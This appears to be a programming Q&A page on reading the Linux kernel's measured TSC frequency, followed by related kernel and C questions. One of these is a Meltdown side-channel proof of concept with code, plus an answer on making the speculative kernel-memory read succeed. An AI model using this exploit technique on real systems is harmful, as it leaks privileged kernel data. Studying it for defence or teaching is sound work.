I have an embedded Linux system running on an Atom, which is a new enough CPU to have an invariant TSC (time stamp counter), whose frequency the kernel measures on startup. I use the TSC in my own code to keep time (avoiding kernel calls), and my startup code measures the TSC rate, but I'd rather just use the kernel's measurement. Is there any way to retrieve this from the kernel? It's not in /proc/cpuinfo anywhere.
BPFtrace
As root, you can retrieve the kernel's TSC rate with bpftrace:
# bpftrace -e 'BEGIN { printf("%u\n", *kaddr("tsc_khz")); exit(); }' | tail -n1
(tested on CentOS 7 and Fedora 29)
That is the value that is defined, exported and maintained/calibrated in arch/x86/kernel/tsc.c.
GDB
Alternatively, also as root, you can read it from /proc/kcore, e.g.:
# gdb /dev/null /proc/kcore -ex 'x/uw 0x'$(grep '\<tsc_khz\>' /proc/kallsyms \
| cut -d' ' -f1) -batch 2>/dev/null | tail -n 1 | cut -f2
(tested on CentOS 7 and Fedora 29)
SystemTap
If the system has neither bpftrace nor gdb available but does have SystemTap, you can get it like this (as root):
# cat tsc_khz.stp
#!/usr/bin/stap -g
function get_tsc_khz() %{ /* pure */
    THIS->__retvalue = tsc_khz;
%}
probe oneshot {
    printf("%u\n", get_tsc_khz());
}
# ./tsc_khz.stp
Of course, you can also write a small kernel module that provides access to tsc_khz via the /sys pseudo file system. Even better, somebody already did that and a tsc_freq_khz module is available on GitHub. With that, the following should work:
# modprobe tsc_freq_khz
$ cat /sys/devices/system/cpu/cpu0/tsc_freq_khz
(tested on Fedora 29, reading the sysfs file doesn't require root)
Kernel Messages
If none of the above is an option, you can parse the TSC rate from the kernel logs. But this gets ugly fast because you see different kinds of messages on different hardware and kernels, e.g. on a Fedora 29 i7 system:
$ journalctl --boot | grep 'kernel: tsc:' -i | cut -d' ' -f5-
kernel: tsc: Detected 2800.000 MHz processor
kernel: tsc: Detected 2808.000 MHz TSC
But on a Fedora 29 Intel Atom just:
kernel: tsc: Detected 2200.000 MHz processor
While on a CentOS 7 i5 system:
kernel: tsc: Fast TSC calibration using PIT
kernel: tsc: Detected 1895.542 MHz processor
kernel: tsc: Refined TSC clocksource calibration: 1895.614 MHz
Perf Values
The Linux kernel doesn't yet provide an API to read the TSC rate. But it does provide one for getting the mult and shift values that can be used to convert TSC counts to nanoseconds. Those values are derived from tsc_khz - also in arch/x86/kernel/tsc.c - where tsc_khz is initialized and calibrated. And they are shared with userspace.
Example program that uses the perf API and accesses the shared page:
#include <asm/unistd.h>
#include <inttypes.h>
#include <linux/perf_event.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
                            int cpu, int group_fd, unsigned long flags)
{
    return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags);
}
The actual code:
int main(int argc, char **argv)
{
    struct perf_event_attr pe = {
        .type = PERF_TYPE_HARDWARE,
        .size = sizeof(struct perf_event_attr),
        .config = PERF_COUNT_HW_INSTRUCTIONS,
        .disabled = 1,
        .exclude_kernel = 1,
        .exclude_hv = 1
    };
    int fd = perf_event_open(&pe, 0, -1, -1, 0);
    if (fd == -1) {
        perror("perf_event_open failed");
        return 1;
    }
    void *addr = mmap(NULL, 4*1024, PROT_READ, MAP_SHARED, fd, 0);
    if (addr == MAP_FAILED) {   // mmap returns MAP_FAILED on error, not NULL
        perror("mmap failed");
        return 1;
    }
    struct perf_event_mmap_page *pc = addr;
    if (pc->cap_user_time != 1) {
        fprintf(stderr, "Perf system doesn't support user time\n");
        return 1;
    }
    printf("%16s %5s\n", "mult", "shift");
    printf("%16" PRIu32 " %5" PRIu16 "\n", pc->time_mult, pc->time_shift);
    close(fd);
    return 0;
}
Tested on Fedora 29; it also works for non-root users.
Those values can be used to convert a TSC count to nanoseconds with a function like this one:
static uint64_t mul_u64_u32_shr(uint64_t cyc, uint32_t mult, uint32_t shift)
{
    __uint128_t x = cyc;
    x *= mult;
    x >>= shift;
    return x;
}
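For completeness, a hedged usage sketch (my own fragment; it assumes the pc pointer from the program above is still mapped and uses __rdtsc() from <x86intrin.h>; the full perf conversion also applies pc->time_offset, which is omitted here):
#include <x86intrin.h>   // __rdtsc()

// Hypothetical usage: measure an interval in nanoseconds.
uint64_t t0 = __rdtsc();
/* ... code being timed ... */
uint64_t ns = mul_u64_u32_shr(__rdtsc() - t0, pc->time_mult, pc->time_shift);

// Since ns = cycles * mult >> shift, the rate itself is recoverable:
// rate [kHz] = 10^6 * 2^shift / mult.
uint64_t tsc_khz = ((uint64_t)1000000 << pc->time_shift) / pc->time_mult;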
CPUID/MSR
Another way to obtain the TSC rate is to follow DPDK's lead.
DPDK on x86_64 basically uses the following strategy:
1. Read the 'Time Stamp Counter and Nominal Core Crystal Clock Information Leaf' via cpuid intrinsics (doesn't require special privileges), if available
2. Read it from the MSR (requires the rawio capability and read permissions on /dev/cpu/*/msr), if possible
3. Calibrate it in userspace by other means, otherwise
FWIW, a quick test shows that the cpuid leaf doesn't seem to be that widely available; e.g. an i7 Skylake and a Goldmont Atom don't have it. Otherwise, as can be seen from the DPDK code, using the MSR requires a bunch of intricate case distinctions.
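For illustration, a minimal sketch of step 1 (my own code, using GCC/clang's <cpuid.h>; note that ECX - the crystal clock in Hz - can legitimately be 0 even when the leaf exists, so all three registers need checking):
#include <cpuid.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

int main(void)
{
    unsigned int eax, ebx, ecx, edx;

    // Leaf 0x15: EAX = TSC/crystal ratio denominator,
    //            EBX = ratio numerator, ECX = crystal clock in Hz.
    // __get_cpuid() returns 0 if the leaf isn't supported at all.
    if (!__get_cpuid(0x15, &eax, &ebx, &ecx, &edx) || !eax || !ebx || !ecx) {
        fprintf(stderr, "CPUID leaf 0x15 not (fully) supported\n");
        return 1;
    }
    uint64_t tsc_hz = (uint64_t)ecx * ebx / eax;
    printf("TSC: %" PRIu64 " kHz\n", tsc_hz / 1000);
    return 0;
}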
However, in case the program already uses DPDK, getting the TSC rate, getting TSC values or converting TSC values is just a matter of using the right DPDK API.
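For instance, a sketch under the assumption that the program links against DPDK and rte_eal_init() has already run (rte_get_tsc_hz() and rte_rdtsc() come from rte_cycles.h):
#include <rte_cycles.h>   // rte_get_tsc_hz(), rte_rdtsc()
#include <stdint.h>

// rte_eal_init() has already resolved the TSC rate by one of the
// strategies above; here we just use it.
static uint64_t measure_ns(void (*work)(void))
{
    uint64_t t0 = rte_rdtsc();
    work();
    // delta * 1e9 overflows uint64_t for intervals beyond a few
    // seconds; fine for short measurements
    return (rte_rdtsc() - t0) * 1000000000ull / rte_get_tsc_hz();
}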
I had a brief look and there doesn't seem to be a built-in way to directly get this information from the kernel.
However, the symbol tsc_khz (which I'm guessing is what you want) is exported by the kernel. You could write a small kernel module that exposes a sysfs interface and use that to read out the value of tsc_khz from userspace.
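A minimal sketch of such a module (my own naming; it surfaces the value as /sys/kernel/tsc_khz):
#include <linux/module.h>
#include <linux/kobject.h>
#include <linux/sysfs.h>
#include <asm/tsc.h>      // declares the exported tsc_khz

static ssize_t tsc_khz_show(struct kobject *k, struct kobj_attribute *a, char *buf)
{
    return sprintf(buf, "%u\n", tsc_khz);
}

static struct kobj_attribute tsc_khz_attr = __ATTR_RO(tsc_khz);

static int __init tscmod_init(void)
{
    // creates /sys/kernel/tsc_khz, world-readable
    return sysfs_create_file(kernel_kobj, &tsc_khz_attr.attr);
}

static void __exit tscmod_exit(void)
{
    sysfs_remove_file(kernel_kobj, &tsc_khz_attr.attr);
}

module_init(tscmod_init);
module_exit(tscmod_exit);
MODULE_LICENSE("GPL");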
If writing a kernel module is not an option, it may be possible to use some Dark Magic™ to read out the value directly from the kernel memory space. Parse the kernel binary or System.map file to find the location of the tsc_khz symbol and read it from /dev/{k}mem. This is, of course, only possible provided that the kernel is configured with the appropriate options.
Lastly, from reading the kernel source comments, it looks like there's a possibility that the TSC may be unstable on some platforms. I don't know much about the inner workings of the x86 arch but this may be something you want to take into consideration.
The TSC rate is directly related to "cpu MHz" in /proc/cpuinfo. Actually, the better number to use is "bogomips". The reason is that while the TSC frequency is the max CPU frequency, the current "cpu MHz" can vary at the time of your invocation.
The bogomips value is computed at boot. You'll need to adjust this value by the number of cores and the processor count (i.e. the number of hyperthreads). That gives you [fractional] MHz. That is what I use to do what you want to do.
To get the processor count, look for the last "processor: " line. The processor count is <value> + 1. Call it "cpu_count".
To get the number of cores, any "cpu cores: " line works; the number of cores is <value>. Call it "core_count".
So, the formula is:
smt_count = cpu_count;
if (core_count)
    smt_count /= core_count;
cpu_freq_in_khz = (bogomips * scale_factor) / smt_count;
That is extracted from my actual code, which is below.
Here's the actual code I use. You won't be able to use it directly because it relies on boilerplate I have, but it should give you some ideas, particularly with how to compute the kHz value from /proc/cpuinfo.
// syslgx/tvtsc -- system time routines (RDTSC)
#include <tgb.h>
#include <zprt.h>
tgb_t systvinit_tgb[] = {
    { .tgb_val = 1, .tgb_tag = "cpu_mhz" },
    { .tgb_val = 2, .tgb_tag = "bogomips" },
    { .tgb_val = 3, .tgb_tag = "processor" },
    { .tgb_val = 4, .tgb_tag = "cpu_cores" },
    { .tgb_val = 5, .tgb_tag = "clflush_size" },
    { .tgb_val = 6, .tgb_tag = "cache_alignment" },
    TGBEOT
};
// _systvinit -- get CPU speed
static void
_systvinit(void)
{
    const char *file;
    const char *dlm;
    XFIL *xfsrc;
    int matchflg;
    char *cp;
    char *cur;
    char *rhs;
    char lhs[1000];
    tgb_pc tgb;
    syskhz_t khzcpu;
    syskhz_t khzbogo;
    syskhz_t khzcur;
    sysmpi_p mpi;

    file = "/proc/cpuinfo";
    xfsrc = fopen(file,"r");
    if (xfsrc == NULL)
        sysfault("systvinit: unable to open '%s' -- %s\n",file,xstrerror());

    dlm = " \t";
    khzcpu = 0;
    khzbogo = 0;

    mpi = &SYS->sys_cpucnt;
    SYSZAPME(mpi);

    // (1) look for "cpu MHz : 3192.515" (preferred)
    // (2) look for "bogomips : 3192.51" (alternate)
    // FIXME/CAE -- on machines with speed-step, bogomips may be preferred (or
    // disable it)
    while (1) {
        cp = fgets(lhs,sizeof(lhs),xfsrc);
        if (cp == NULL)
            break;

        // strip newline
        cp = strchr(lhs,'\n');
        if (cp != NULL)
            *cp = 0;

        // look for symbol value divider
        cp = strchr(lhs,':');
        if (cp == NULL)
            continue;

        // split symbol and value
        *cp = 0;
        rhs = cp + 1;

        // strip trailing whitespace from symbol
        for (cp -= 1; cp >= lhs; --cp) {
            if (! XCTWHITE(*cp))
                break;
            *cp = 0;
        }

        // convert "foo bar" into "foo_bar"
        for (cp = lhs; *cp != 0; ++cp) {
            if (XCTWHITE(*cp))
                *cp = '_';
        }

        // match on interesting data
        matchflg = 0;
        for (tgb = systvinit_tgb; TGBMORE(tgb); ++tgb) {
            if (strcasecmp(lhs,tgb->tgb_tag) == 0) {
                matchflg = tgb->tgb_val;
                break;
            }
        }
        if (! matchflg)
            continue;

        // look for the value
        cp = strtok_r(rhs,dlm,&cur);
        if (cp == NULL)
            continue;

        zprt(ZPXHOWSETUP,"_systvinit: GRAB/%d lhs='%s' cp='%s'\n",
            matchflg,lhs,cp);

        // process the value
        // NOTE: because of Intel's speed step, take the highest cpu speed
        switch (matchflg) {
        case 1:  // genuine CPU speed
            khzcur = _systvinitkhz(cp);
            if (khzcur > khzcpu)
                khzcpu = khzcur;
            break;

        case 2:  // the consolation prize
            khzcur = _systvinitkhz(cp);

            // we've seen some "wild" values
            if (khzcur > 10000000)
                break;

            if (khzcur > khzbogo)
                khzbogo = khzcur;
            break;

        case 3:  // remember # of cpu's so we can adjust bogomips
            mpi->mpi_cpucnt = atoi(cp);
            mpi->mpi_cpucnt += 1;
            break;

        case 4:  // remember # of cpu cores so we can adjust bogomips
            mpi->mpi_corecnt = atoi(cp);
            break;

        case 5:  // cache flush size
            mpi->mpi_cshflush = atoi(cp);
            break;

        case 6:  // cache alignment
            mpi->mpi_cshalign = atoi(cp);
            break;
        }
    }

    fclose(xfsrc);

    // we want to know the number of hyperthreads
    mpi->mpi_smtcnt = mpi->mpi_cpucnt;
    if (mpi->mpi_corecnt)
        mpi->mpi_smtcnt /= mpi->mpi_corecnt;

    zprt(ZPXHOWSETUP,"_systvinit: FINAL khzcpu=%d khzbogo=%d mpi_cpucnt=%d mpi_corecnt=%d mpi_smtcnt=%d mpi_cshalign=%d mpi_cshflush=%d\n",
        khzcpu,khzbogo,mpi->mpi_cpucnt,mpi->mpi_corecnt,mpi->mpi_smtcnt,
        mpi->mpi_cshalign,mpi->mpi_cshflush);

    if ((mpi->mpi_cshalign == 0) || (mpi->mpi_cshflush == 0))
        sysfault("_systvinit: cache parameter fault\n");

    do {
        // use the best reference
        // FIXME/CAE -- with speed step, bogomips is better
#if 0
        if (khzcpu != 0)
            break;
#endif

        khzcpu = khzbogo;
        if (mpi->mpi_smtcnt)
            khzcpu /= mpi->mpi_smtcnt;
        if (khzcpu != 0)
            break;

        sysfault("_systvinit: unable to obtain cpu speed\n");
    } while (0);

    systvkhz(khzcpu);

    zprt(ZPXHOWSETUP,"_systvinit: EXIT\n");
}
// _systvinitkhz -- decode value
// RETURNS: CPU freq in khz
static syskhz_t
_systvinitkhz(char *str)
{
    char *src;
    char *dst;
    int rhscnt;
    char bf[100];
    syskhz_t khz;

    zprt(ZPXHOWSETUP,"_systvinitkhz: ENTER str='%s'\n",str);

    dst = bf;
    src = str;

    // get lhs of lhs.rhs
    for (; *src != 0; ++src, ++dst) {
        if (*src == '.')
            break;
        *dst = *src;
    }

    // skip over the dot
    ++src;

    // get rhs of lhs.rhs and determine how many rhs digits we have
    rhscnt = 0;
    for (; *src != 0; ++src, ++dst, ++rhscnt)
        *dst = *src;
    *dst = 0;

    khz = atol(bf);
    zprt(ZPXHOWSETUP,"_systvinitkhz: PRESCALE bf='%s' khz=%d rhscnt=%d\n",
        bf,khz,rhscnt);

    // scale down (e.g. we got xxxx.yyyy)
    for (; rhscnt > 3; --rhscnt)
        khz /= 10;

    // scale up (e.g. we got xxxx.yy--bogomips does this)
    for (; rhscnt < 3; ++rhscnt)
        khz *= 10;

    zprt(ZPXHOWSETUP,"_systvinitkhz: EXIT khz=%d\n",khz);

    return khz;
}
UPDATE:
Sigh. Yes.
I was using "cpu MHz" from /proc/cpuinfo prior to the introduction of processors with "speed step" technology, so I switched to "bogomips" and the algorithm was derived empirically based on that. When I derived it, I only had access to hyperthreaded machines. However, I've found an old one that is not and the SMT thing isn't valid.
However, it appears that bogomips is always 2x the [maximum] CPU speed. See http://www.clifton.nl/bogo-faq.html That hasn't always been my experience on all kernel versions over the years [IIRC, I started with 0.99.x], but it's probably a reliable assumption these days.
With "constant TSC" [which all newer processors have], denoted by constant_tsc in the flags: field in /proc/cpuinfo, the TSC rate is the maximum CPU frequency.
Originally, the only way to get the frequency information was from /proc/cpuinfo. Now, however, in more modern kernels, there is another way that may be easier and more definitive [I had code coverage for this in other software of mine, but had forgotten about it]:
/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq
The content of this file is the maximum CPU frequency in kHz. There are analogous files for the other CPU cores. The files should be identical on most sane motherboards (i.e. ones that are composed of the same model chip and don't try to mix [say] i7s and Atoms). Otherwise, you'd have to keep track of the info on a per-core basis, and that would get messy fast.
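A minimal C sketch of reading it (hypothetical helper; returns -1 on failure):
#include <stdio.h>

// Read the maximum CPU frequency (in kHz) for cpu0 from sysfs.
long read_max_freq_khz(void)
{
    long khz = -1;
    FILE *f = fopen("/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq", "r");
    if (f != NULL) {
        if (fscanf(f, "%ld", &khz) != 1)
            khz = -1;
        fclose(f);
    }
    return khz;
}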
The given directory also has other interesting files. For example, if your processor has "speed step" [and some of the other files can tell you that], you can force maximum performance by writing performance to the scaling_governor file. This will disable use of speed step.
If the processor did not have constant_tsc, you'd have to disable speed step [and run the cores at maximum rate] to get accurate measurements.
Related
This is not strictly about programming, but I'll ask it here anyway.
In Linux's start_kernel() function, inside the mm_init() function, I see the vmalloc_init() function.
Inside that function I see code like this:
void __init vmalloc_init(void)
{
    struct vmap_area *va;
    struct vm_struct *tmp;
    int i;

    /*
     * Create the cache for vmap_area objects.
     */
    vmap_area_cachep = KMEM_CACHE(vmap_area, SLAB_PANIC);

    for_each_possible_cpu(i) {
        struct vmap_block_queue *vbq;
        struct vfree_deferred *p;

        vbq = &per_cpu(vmap_block_queue, i);
        spin_lock_init(&vbq->lock);
        INIT_LIST_HEAD(&vbq->free);
        p = &per_cpu(vfree_deferred, i);
        init_llist_head(&p->list);
        INIT_WORK(&p->wq, free_work);
    }

    /* Import existing vmlist entries. */
    for (tmp = vmlist; tmp; tmp = tmp->next) {
        va = kmem_cache_zalloc(vmap_area_cachep, GFP_NOWAIT);
        if (WARN_ON_ONCE(!va))
            continue;

        va->va_start = (unsigned long)tmp->addr;
        va->va_end = va->va_start + tmp->size;
        va->vm = tmp;
        insert_vmap_area(va, &vmap_area_root, &vmap_area_list);
    }

    /*
     * Now we can initialize a free vmap space.
     */
    vmap_init_free_space();
    vmap_initialized = true;
}
I'm not sure whether this code runs on every CPU (core) or just on the first CPU.
If this code runs on every SMP core, how does the code inside the for_each_possible_cpu loop run?
The SMP setup seems to be done before this function.
start_kernel() calls mm_init() which calls vmalloc_init(). Only the first (boot) CPU is active at that point. Later, start_kernel() calls arch_call_rest_init() which calls rest_init().
rest_init() creates a kernel thread for the init task with entry point kernel_init(). kernel_init() calls kernel_init_freeable(). kernel_init_freeable() eventually calls smp_init() to activate the remaining CPUs.
Every macro in the for_each_cpu family is just a wrapper for a for() loop whose iterator is a CPU index.
E.g., the core macro of this family is defined as
#define for_each_cpu(cpu, mask)                 \
    for ((cpu) = -1;                            \
         (cpu) = cpumask_next((cpu), (mask)),   \
         (cpu) < nr_cpu_ids;)
Each macro in the for_each_cpu family uses its own CPU mask, which is just a set of bits corresponding to CPU indices. E.g., the mask for the for_each_possible_cpu macro has a bit set for every CPU index that could ever be enabled in the current machine session.
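For illustration, a sketch with a hypothetical per-CPU counter; the function executes on whichever single CPU calls it, and the loop merely iterates over the indices set in cpu_possible_mask:
#include <linux/percpu.h>
#include <linux/cpumask.h>

static DEFINE_PER_CPU(unsigned long, my_counter);   // hypothetical per-CPU data

// Runs on one CPU only; the loop does not hop between CPUs, it just
// addresses each possible CPU's copy of the variable by index.
static unsigned long total_my_counter(void)
{
    unsigned long sum = 0;
    int cpu;

    for_each_possible_cpu(cpu)
        sum += per_cpu(my_counter, cpu);
    return sum;
}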
I am attempting to exploit the meltdown security flaw on Ubuntu 16.04, with an unpatched kernel 4.8.0-36 on an Intel Core-i5 4300M CPU.
First, I am storing the secret data at an address in kernel space using a kernel module :
static __init int initialize_proc(void)
{
    char *key_val = "abcd";
    printk("Secret data address = %p\n", key_val);
    printk("Value at %p = %s\n", key_val, key_val);
    return 0;
}
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out of order execution
int meltdown(unsigned long kernel_addr)
{
    char data = *(char *)kernel_addr;   // Raises exception
    array[data*4096 + DELTA] += 10;     // <----- Executed out of order
    return 0;
}
I am expecting the CPU to go ahead and cache the array element at index (data*4096 + DELTA) while executing out of order. After this, the privilege check on the load fails and SIGSEGV is raised.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86()
{
    register uint64_t time1, time2;
    unsigned int junk;   // aux output of rdtscp
    int min = 10000;
    int temp, i, k;

    for (i = 0; i < 256; i++) {
        time1 = __rdtscp(&junk);             // timestamp before memory access
        temp = array[i*4096 + DELTA];
        time2 = __rdtscp(&junk) - time1;     // change in timestamp after the access
        if (time2 <= min) {
            min = time2;
            k = i;
        }
    }
    printf("array[%d*4096+DELTA]\n", k);
}
Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.
However, this is not working and I am getting random outputs.
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[241*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[78*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[146*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[115*4096+DELTA]
The possible reasons I could think of are:
1. The instruction caching the array element is not getting executed out of order.
2. Out of order execution is occurring but the cache is being flushed.
3. I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect.
Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: Why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order ?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel()
{
    int i, k, temp;
    uint64_t diff;
    volatile uint8_t *addr;
    double min = 10000000;
    struct timespec start, end;

    for (i = 0; i < 256; i++) {
        addr = &array[i*4096 + DELTA];
        clock_gettime(CLOCK_MONOTONIC, &start);
        temp = *addr;
        clock_gettime(CLOCK_MONOTONIC, &end);
        diff = end.tv_nsec - start.tv_nsec;
        if (diff <= min) {
            min = diff;
            k = i;
        }
    }
    if (min < 600)
        printf("Accessed element : array[%d*4096+DELTA]\n", k);
}
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr)
{
    char kernel_data;

    asm volatile(
        ".rept 1000;"
        "add $0x01, %%eax;"
        ".endr;"
        :
        :
        : "eax"
    );
    kernel_data = *(char *)kernel_addr;
    array[kernel_data*4096 + DELTA] += 10;
}
Using procfs to force the data into the cache before performing a time attack (see meltdown)
int meltdown(unsigned long kernel_addr)
{
    // Cache the data to improve success
    int fd = open("/proc/my_secret_key", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return -1;
    }
    int ret = pread(fd, NULL, 0, 0);    // Data is cached
    char data = *(char *)kernel_addr;   // Raises exception
    array[data*4096 + DELTA] += 10;     // <----- Out of order
    return 0;
}
For anyone interested in setting it up, here is the link to the github repo
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel()
{
    int i;
    for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;
    for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}

void catch_segv()
{
    siglongjmp(jbuf, 1);
}

int main()
{
    unsigned long kernel_addr = 0xfa2ef024;

    signal(SIGSEGV, catch_segv);
    if (sigsetjmp(jbuf, 1) == 0) {
        // meltdown(kernel_addr);
        meltdown_busy_loop(kernel_addr);
    } else {
        printf("Memory Access Violation\n");
    }
    attackChannel_x86();
}
I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
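A hedged sketch of what that could look like in the question's module (it assumes key_val is moved to file scope; the wiring to a proc read handler is omitted):
// Moved to file scope so both the init code and the helper see it (assumption).
static const char *key_val = "abcd";

// Call this from kernel context (e.g. a read handler on the module's
// proc file) so a privileged access pulls the secret into L1d.
static void warm_secret_into_l1d(void)
{
    volatile const char *p = key_val;
    (void)*p;   // privileged load; fills the L1d line holding the secret
}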
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of latency per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run before it chews through the adds and the faulting load reaches retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell). https://agner.org/optimize/
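A sketch of that substitution (my own helper name; the repeat count is illustrative):
// Long-latency dependency chain to delay retirement of the faulting load:
// 64 dependent sqrtpd's give roughly 64 * 16 cycles of OoO window on Haswell.
static inline void delay_retirement(void)
{
    asm volatile(
        "xorps  %%xmm0, %%xmm0;"   // start with a known value (sqrt(0) = 0)
        ".rept 64;"
        "sqrtpd %%xmm0, %%xmm0;"   // 1 uop, ~16 cycle latency, serialized
        ".endr;"
        : : : "xmm0");
}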
I am working on updating our kernel drivers to work with Linux kernel 4.4.0 on Ubuntu 16.04. The drivers last worked with Linux kernel 3.9.2.
In one of the modules, we have procfs entries created to read/write the on-board fan monitoring values. Fan monitoring is used to read/write the CPU or GPU temperature/modulation etc. values.
The module is using the following api to create procfs entries:
struct proc_dir_entry *create_proc_entry(const char *name, umode_t mode,
                                         struct proc_dir_entry *parent);
Something like:
struct proc_dir_entry *proc_entry =
    create_proc_entry("fmon_gpu_temp", 0644, proc_dir);
proc_entry->read_proc = read_proc;
proc_entry->write_proc = write_proc;
Now, the read_proc is implemented something like this:
static int read_value(char *buf, char **start, off_t offset, int count, int *eof, void *data)
{
    int len = 0;
    int idx = (int)data;

    if (idx == TEMP_FANCTL)
        len = sprintf(buf, "%d.%02d\n", fmon_readings[idx] / TEMP_SAMPLES,
                      fmon_readings[idx] % TEMP_SAMPLES * 100 / TEMP_SAMPLES);
    else if (idx == TEMP_CPU) {
        int i;
        len = sprintf(buf, "%d", fmon_readings[idx]);
        for (i = 0; i < FCTL_MAX_CPUS && fmon_cpu_temps[i]; i++) {
            len += sprintf(buf+len, " CPU%d=%d", i, fmon_cpu_temps[i]);
        }
        len += sprintf(buf+len, "\n");
    }
    else if (idx >= 0 && idx < READINGS_MAX)
        len = sprintf(buf, "%d\n", fmon_readings[idx]);

    *eof = 1;
    return len;
}
This read function assumes that the user has provided enough buffer space to store the temperature value, which is correctly handled in the userspace program. Also, every call to this function returns the value in its totality, so there is no support for (or need of) subsequent reads of the same temperature value.
Plus, if I use the "cat" program on this procfs entry from the shell, it correctly displays the value. This works, I think, because of setting EOF to true and returning the count of bytes read.
Newer Linux kernels do not support this API anymore.
My question is:
How can I port this to the new procfs API structure, keeping the functionality the same: every read should return the value, and the 'cat' program should also work fine and not go into an infinite loop?
The primary user interface for reading files on Linux is read(2). Its counterpart in kernel space is the .read function in struct file_operations.
Every other mechanism for reading a file in kernel space (read_proc, seq_file, etc.) is actually a (parametrized) implementation of the .read function.
The only way for the kernel to return an EOF indicator to user space is to return 0 as the number of bytes read.
Even the read_proc implementation you have for the 3.9 kernel actually implements the eof flag by returning 0 on the next invocation. And cat actually performs a second invocation of read to find that the file has ended.
(Moreover, cat performs more than 2 invocations of read: the first with 1 as the count, the second with a count equal to the page size minus 1, and the last with the remaining count.)
The simplest way to implement a "one-shot" read is to use a seq_file in single_open() mode.
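A hedged sketch of that port for kernel 4.4 (it reuses the question's fmon_readings and assumes the per-file index is passed via proc_create_data()):
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/module.h>

// The show callback prints the whole value in one go; returning 0 from
// the subsequent read() is what makes cat see EOF and stop.
static int fmon_show(struct seq_file *m, void *v)
{
    int idx = (long)m->private;

    seq_printf(m, "%d\n", fmon_readings[idx]);   // fmon_readings: from the question
    return 0;
}

static int fmon_open(struct inode *inode, struct file *file)
{
    return single_open(file, fmon_show, PDE_DATA(inode));
}

static const struct file_operations fmon_fops = {
    .owner   = THIS_MODULE,
    .open    = fmon_open,
    .read    = seq_read,
    .llseek  = seq_lseek,
    .release = single_release,
};

// registration (replaces create_proc_entry()):
//   proc_create_data("fmon_gpu_temp", 0644, proc_dir, &fmon_fops, (void *)(long)idx);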
This is my first question on Stack Overflow and my English is unfortunately poor, but I want to try it.
A customized routine based on kissfft's twotonetest produces very different results on two different systems.
The program compiled with gcc on x86 under Ubuntu yields the correct values. The program compiled with the OpenWRT SDK for the Arduino YUN (Atheros AR9331) displays incorrect values. It seems as if the definition of FIXED_POINT is ignored.
The following is defined:
#define FIXED_POINT 32
the function:
double GetFreqBuf(tBuf *io_pBuf, int nfft)
{
    kiss_fftr_cfg cfg = NULL;
    kiss_fft_cpx *kout = NULL;
    kiss_fft_scalar *tbuf = NULL;
    uint32_t ptr;
    int i;
    double sigpow = 0;
    double noisepow = 0;
    long maxrange = SHRT_MAX;

    cfg = kiss_fftr_alloc(nfft, 0, NULL, NULL);
    tbuf = KISS_FFT_MALLOC(nfft * sizeof(kiss_fft_scalar));
    kout = KISS_FFT_MALLOC(nfft * sizeof(kiss_fft_cpx));

    /* generate the array from samples */
    for (i = 0; i < nfft; i++) {
        // only one channel -- a crutch; it would also work with 2 channels now, but this way is faster
        if (io_pBuf->IndexNextValue >= (i*2))
            ptr = io_pBuf->IndexNextValue - (i*2);
        else
            ptr = io_pBuf->bufSize - ((i*2) - io_pBuf->IndexNextValue);
        tbuf[i] = io_pBuf->aData[ptr];
    }

    kiss_fftr(cfg, tbuf, kout);

    for (i = 0; i < (nfft/2 + 1); ++i) {
        double tmpr = (double)kout[i].r / (double)maxrange;
        double tmpi = (double)kout[i].i / (double)maxrange;
        double mag2 = tmpr*tmpr + tmpi*tmpi;
        if (i != 0 && i != nfft/2)
            mag2 *= 2;   /* all bins except DC and Nyquist have symmetric counterparts implied */
        /* if there is power between the freqs, it is signal, otherwise noise */
        if (i > nfft/96 && i < nfft/32)
            noisepow += mag2;
        else
            sigpow += mag2;
    }
    kiss_fft_cleanup();
    //printf("TEST %d values, noisepow: %f sigpow: %f noise # %fdB\n", nfft, noisepow, sigpow, 10*log10(noisepow/sigpow + 1e-30));
    free(cfg);
    free(tbuf);
    free(kout);
